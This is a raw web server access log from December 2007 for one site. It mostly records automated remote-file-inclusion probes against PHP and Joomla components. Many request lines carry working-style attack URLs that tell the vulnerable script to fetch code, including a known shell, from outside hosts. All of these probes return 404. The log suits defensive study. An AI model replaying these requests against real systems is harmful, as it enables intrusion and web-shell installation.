59.106.20.28 - - [23/Dec/2007:17:29:07 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
218.38.58.151 - - [23/Dec/2007:17:29:18 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
218.38.58.151 - - [23/Dec/2007:17:29:19 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:17:29:31 -0800] "GET /logs/access_071029.log//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:17:29:32 -0800] "GET //skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:17:29:32 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.144.202.123 - - [23/Dec/2007:17:29:48 -0800] "GET /logs//popper/childwindow.inc.php?form=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
202.144.202.123 - - [23/Dec/2007:17:29:59 -0800] "GET //popper/childwindow.inc.php?form=http://h1.ripway.com/elt/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:17:31:12 -0800] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:17:31:32 -0800] "GET /logs/access_071008.log//skin/zero_vote/error.php?dir=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.89.224.76 - - [23/Dec/2007:17:31:56 -0800] "GET /logs/access_071217.log HTTP/1.0" 200 9747622 "-" "Wget/1.10.2"
81.52.241.10 - - [23/Dec/2007:17:32:16 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.52.241.10 - - [23/Dec/2007:17:32:17 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.64.49.252 - - [23/Dec/2007:17:33:10 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.tukangbecak.com/r57.pdf??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.119.157.176 - - [23/Dec/2007:17:33:43 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.tukangbecak.com/r57.pdf??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:17:36:38 -0800] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
59.106.20.28 - - [23/Dec/2007:17:36:38 -0800] "GET /logs/access_071105.log//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:17:36:38 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:17:36:39 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:17:36:39 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:17:36:39 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.117.166.233 - - [23/Dec/2007:17:38:14 -0800] "GET /logs/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_roothttp://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
216.117.166.233 - - [23/Dec/2007:17:38:14 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_roothttp://www.business-technology-associates.com/offl//lib/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.galf.org"
218.38.58.151 - - [23/Dec/2007:17:38:43 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
218.38.58.151 - - [23/Dec/2007:17:38:43 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.52.142.226 - - [23/Dec/2007:17:39:58 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.52.142.226 - - [23/Dec/2007:17:39:58 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.52.241.10 - - [23/Dec/2007:17:40:16 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.52.241.10 - - [23/Dec/2007:17:40:16 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
208.53.147.60 - - [23/Dec/2007:17:40:32 -0800] "GET /logs/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php?mosConfig_absolute_path=http://www.djspower.de/cms//components/com_forum/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
59.106.20.28 - - [23/Dec/2007:17:42:05 -0800] "GET /logs/access_071217.log//modules/vwar/admin/admin.php?vwar_root=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
87.118.106.58 - - [23/Dec/2007:17:44:47 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.118.106.58 - - [23/Dec/2007:17:44:47 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.cartographia.org/administrator/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.34.177.135 - - [23/Dec/2007:17:46:20 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
64.34.177.135 - - [23/Dec/2007:17:46:20 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
193.242.108.82 - - [23/Dec/2007:17:47:12 -0800] "GET /logs//administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
193.242.108.82 - - [23/Dec/2007:17:47:12 -0800] "GET //administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
89.207.81.253 - - [23/Dec/2007:17:48:31 -0800] "GET /logs/access_071203.log//index2.php?p=http://asterweb.com.br/cav/s.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:17:49:29 -0800] "GET /logs/access_070826.log/modules/My_eGallery/index.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:17:49:29 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:17:49:30 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.111.179.200 - - [23/Dec/2007:17:49:42 -0800] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.111.179.200 - - [23/Dec/2007:17:49:47 -0800] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.52.142.226 - - [23/Dec/2007:17:49:48 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.207.81.253 - - [23/Dec/2007:17:51:30 -0800] "GET /logs/access_071022.log//index2.php?p=http://asterweb.com.br/cav/s.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:17:52:17 -0800] "GET /logs/access_071028.log/modules/My_eGallery/index.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:17:53:15 -0800] "GET /logs/access_070826.log/modules/My_eGallery/index.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:17:53:15 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:17:53:15 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
161.58.198.111 - - [23/Dec/2007:17:54:08 -0800] "GET /logs/access_071203.log//mcf.php?content=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
161.58.198.111 - - [23/Dec/2007:17:54:08 -0800] "GET //mcf.php?content=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
161.58.198.111 - - [23/Dec/2007:17:54:08 -0800] "GET /logs//mcf.php?content=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.52.142.226 - - [23/Dec/2007:17:54:16 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.rce-bay.com/ID/IndoID??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.248.100.178 - - [23/Dec/2007:17:55:34 -0800] "GET /index3.php?page=phphttp://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
89.248.100.178 - - [23/Dec/2007:17:55:34 -0800] "GET /logs/index3.php?page=phphttp://www.emabe.com/administrator/templates/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
161.58.198.111 - - [23/Dec/2007:17:56:01 -0800] "GET /logs/access_071119.log//mcf.php?content=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
72.36.227.10 - - [23/Dec/2007:17:56:10 -0800] "GET /logs/access_070702.log/modules/My_eGallery/index.php?basepath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
207.210.91.2 - - [23/Dec/2007:17:57:41 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://miepicardenas.org/media/media.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.210.91.2 - - [23/Dec/2007:17:57:41 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://miepicardenas.org/media/media.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.194.246 - - [23/Dec/2007:17:59:15 -0800] "GET /logs//index2.php?content=http://kmtm.ft.ugm.ac.id/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.15.194.246 - - [23/Dec/2007:17:59:20 -0800] "GET //index2.php?content=http://kmtm.ft.ugm.ac.id/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
77.48.10.14 - - [23/Dec/2007:18:00:55 -0800] "GET /logs//[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.universidadcorporativa.com/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
77.48.10.14 - - [23/Dec/2007:18:00:55 -0800] "GET //[VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.universidadcorporativa.com/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
66.249.73.202 - - [23/Dec/2007:18:01:30 -0800] "GET /cendoc.php HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.galf.org"
72.30.216.88 - - [23/Dec/2007:18:04:23 -0800] "GET /logs/access_070820.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.214.37.238 - - [23/Dec/2007:18:05:34 -0800] "GET /logs/access_071217.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.37.238 - - [23/Dec/2007:18:05:34 -0800] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.214.37.238 - - [23/Dec/2007:18:05:34 -0800] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:07:18 -0800] "GET /logs/access_070917.log/start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:07:23 -0800] "GET /start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:07:28 -0800] "GET /logs/start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:08:08 -0800] "GET /logs/access_070917.log/start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:08:08 -0800] "GET /logs/access_070917.log/start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:08:13 -0800] "GET /start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:08:13 -0800] "GET /start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
69.60.109.199 - - [23/Dec/2007:18:08:18 -0800] "GET /logs/start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.60.109.199 - - [23/Dec/2007:18:08:19 -0800] "GET /logs/start.php?s=http://hom3.t35.com/xpl/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
207.210.91.2 - - [23/Dec/2007:18:10:56 -0800] "GET /logs/access_070716.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://miepicardenas.org/media/media.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.210.91.2 - - [23/Dec/2007:18:12:01 -0800] "GET /logs/access_071001.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://miepicardenas.org/media/media.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
85.214.37.238 - - [23/Dec/2007:18:12:22 -0800] "GET /logs/access_071112.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:12:59 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:13:00 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.111.179.200 - - [23/Dec/2007:18:13:56 -0800] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
62.111.179.200 - - [23/Dec/2007:18:13:57 -0800] "GET /modules/My_eGallery/index.php?basepath=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.242.108.82 - - [23/Dec/2007:18:14:43 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
193.242.108.82 - - [23/Dec/2007:18:14:43 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
211.129.152.113 - - [23/Dec/2007:18:14:50 -0800] "GET /logs/access_070716.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
211.129.152.113 - - [23/Dec/2007:18:15:09 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://gw-gold.net/xpl/good/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:15:56 -0800] "GET /logs/access_071014.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
83.170.102.103 - - [23/Dec/2007:18:15:56 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:15:56 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
83.170.102.103 - - [23/Dec/2007:18:15:57 -0800] "GET /logs/access_070917.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.84.245.36 - - [23/Dec/2007:18:16:07 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://222.122.158.214/bbs1/skin/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
80.84.245.36 - - [23/Dec/2007:18:16:07 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://222.122.158.214/bbs1/skin/log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.galf.org"
161.58.198.111 - - [23/Dec/2007:18:16:15 -0800] "GET /logs/access_071014.log/test.php?page=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
161.58.198.111 - - [23/Dec/2007:18:16:15 -0800] "GET /test.php?page=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
161.58.198.111 - - [23/Dec/2007:18:16:16 -0800] "GET /logs/test.php?page=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.50.12.32 - - [23/Dec/2007:18:17:27 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.12.32 - - [23/Dec/2007:18:17:28 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.210.190.67 - - [23/Dec/2007:18:17:40 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
62.210.190.67 - - [23/Dec/2007:18:17:40 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
161.58.198.111 - - [23/Dec/2007:18:19:02 -0800] "GET /logs/access_070917.log/test.php?page=http://www.thewellnessvillage.biz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
205.234.148.64 - - [23/Dec/2007:18:19:05 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
205.234.148.64 - - [23/Dec/2007:18:19:05 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.galf.org"
64.34.177.135 - - [23/Dec/2007:18:20:56 -0800] "GET /logs//administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
64.34.177.135 - - [23/Dec/2007:18:20:56 -0800] "GET //administrator/components/com_color/admin.color.php?mosConfig_live_site=http://www.fishnet.pl//components/com_zoom/classes/iptc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
72.36.115.44 - - [23/Dec/2007:18:21:12 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.galf.org"
72.36.115.44 - - [23/Dec/2007:18:21:14 -0800] "GET /logs/access_070903.log HTTP/1.0" 200 65536 "-" "CazoodleBot/CazoodleBot-0.1 (CazoodleBot Crawler; http://www.cazoodle.com/cazoodlebot; cazoodlebot@cazoodle.com)" "www.galf.org"
62.178.2.49 - - [23/Dec/2007:18:21:53 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
74.6.22.162 - - [23/Dec/2007:18:21:55 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.22.162 - - [23/Dec/2007:18:21:56 -0800] "GET /logs/access_071022.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:18:23:37 -0800] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.36.227.10 - - [23/Dec/2007:18:23:37 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.50.12.32 - - [23/Dec/2007:18:24:17 -0800] "GET /logs/access_071014.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.50.12.32 - - [23/Dec/2007:18:24:17 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.50.12.32 - - [23/Dec/2007:18:24:17 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
